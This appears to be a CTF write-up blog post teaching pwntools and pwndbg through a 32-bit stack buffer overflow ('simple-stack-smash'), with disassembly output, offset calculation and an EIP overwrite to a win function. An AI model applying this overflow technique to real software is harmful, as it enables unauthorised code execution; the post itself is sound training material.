Pwntools 101 - Pwndbg & Buffer Overflows
About The Project
Pwndbg and Pwntools are Python frameworks for automating different parts of exploit development. These frameworks are highly popular amongst CTF players as they simplify and accelerate the creation of Proof of Concept (PoC) scripts for memory corruption exploits. I’m not proficient in using pwntools, and pwndbg, but this marks the beginning of a series of blogs aimed at improving my skills with pwntools for memory corruption CTF challenges.
Simple Stack Smash - Virgina Tech Summit CTF 2023
Virginia Tech’s Summit CTF was this past April, and I joined promptly about an hour or two before it ended. Taking a look at the Reverse Engineering challenges, an introductory 32-bit ELF binary challenge called ‘simple-stack-smash’ was available and the perfect buffer-overflow (BoF) candidate to explore Pwntools.
1) Let’s leverage checksec to identify protections on the binary.
The image below shows there’s no stack canary, but there is a non-executable stack (NX). What does this mean?
- No Stack Canary: there’s no additional check on the stack for buffer overflows.
- Non-executable stack: We cannot execute code onto the stack (start thinking ROP)
Now lets explore the binary a little bit, by starting at main
.
If you’re new to Reverse Engineering, and looking at how to identify main
, checkout this YouTube video made by Arch Cloud Labs a year ago on covering this very subject. The main
function within Ghidra shows taking user input via fgets
of up to 0x400
bytes and storing it in a buffer of only 16 bytes. Ultimately, if an end user enters more than 16 bytes, the fixed length-array will overflow.
This is a classic buffer overflow attack. Often, telltale signs in CTFs of these types of vulnerabilities are the use of gets
, which performs no bounds checking, or the use of an insecure copy command such as strcpy
or memcpy
. However, here we see an example of where fgets
, and by extension, other copy functions where the number of bytes copied is specified by the user, can be used incorrectly.
2) Identify the CTF Goal
Immediately, it’s visible to the competitor the buffer can be overwritten and crash the program.
However, crashes are not the desired end goal. Ultimately, the goal is to overwrite the EIP register to influence control flow of the binary.
But what does one do once control flow is gained since the NX bit prevents executing arbitrary code on the stack? Enter, the “win
function”.
With non-executable stacks in entry-level CTF BoFs, a competitor usually end up in a “ret2win” scenario. A ret2win challenge’s goal is to influence execution to a “win method”.
This “win method” usually returns a shell or gives the user a flag. Sure enough, our non-stripped binary has said win
method at offset 0x8049216
.
In order to complete this challenge, EIP will have to contain the address of the win method.
Let’s analyze this further.
The disassembly below shows a string loaded into eax
(0x0804922f
), pushed onto the stack, and then executed via the system
syscall.
Cross-referencing the strings output (using axt
in radare2), the following command is executed: cat /src/flag.txt
. Obviously /src/flag.txt
does not exist on the local machine, but rather the target machine the competition is expecting the competitor to connect to.
[0x08049216]> s sym.win
[0x08049216]> pdf
┌ 41: sym.win ();
│ 0x08049216 f30f1efb endbr32
│ 0x0804921a 55 push ebp
│ 0x0804921b 89e5 mov ebp, esp
│ 0x0804921d 53 push ebx
│ 0x0804921e e82dffffff call sym.__x86.get_pc_thunk.bx
│ 0x08049223 81c3dd2d0000 add ebx, 0x2ddd
│ 0x08049229 8d8308e0ffff lea eax, [ebx - 0x1ff8]
│ 0x0804922f 50 push eax ; const char *string
│ 0x08049230 e88bfeffff call sym.imp.system ; int system(const char *string)
│ 0x08049235 83c404 add esp, 4
│ 0x08049238 6a00 push 0 ; int status
└ 0x0804923a e891feffff call sym.imp.exit ; void exit(int status)
............................................................................................................
[0x08049216]> iz
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00002008 0x0804a008 17 18 .rodata ascii cat /src/flag.txt
1 0x0000201a 0x0804a01a 24 25 .rodata ascii Please enter your name:
2 0x00002033 0x0804a033 11 12 .rodata ascii Hello, %s!\n
With a target function identified, and the vulnerability clear as day, now one must generate a payload to overwrite EIP and then influence code execution to the win
method.
3) Payload Offset Generation
Calculating the offset and generating the payload for buffer overflows overwrite EIP is often tedious.
This is where pwndbg comes into the picture. Pwndbg is a GDB plugin with handy helper functions for Reverse Engineering tasks.
A particular function of interest to us is cyclic
. Thecyclic
function generates unique patterns to be fed to EIP to trigger a crash.
After the crash, depending on the bytes within EIP, the appropriate offset can be calculated to idenitfy how many bytes need to be generated until the attacker can control what’s in the EIP register. The image below shows EIP with “gaaa
”. The cyclic
command can then be used to find the offset neded to control EIP
which is 24 bytes.
Now, pwntools can be used to generate a simple template via $> pwn template
.
This template is pretty awesome. It can easily be used for remote and local exploits. The image below shows copying data from pwndbg to pwntools for building our proof-of-concept exploit. Line 38 shows p32(0x08049216)
. This function “packs” the bytes in little-endian at runtime, making it easier to read and construct our payload while writing the “pwn” script.
4) Putting it All Togeter
With output from pwndbg, and pwntools the target directory of /src/flag.txt
can be created locally to simply show the successful overwrite and code execution
Beyond The Blog
This was a straight forward buffer overflow walkthrough with pwntools and pwndbg. It’s handy to keep these templates around for future competitions, and building more complicated scripts. Hopefully you found it helpful! More tutorials for can be found on pwntools official documentation here.
References
Note, this article as gramatically edited by ChatGPT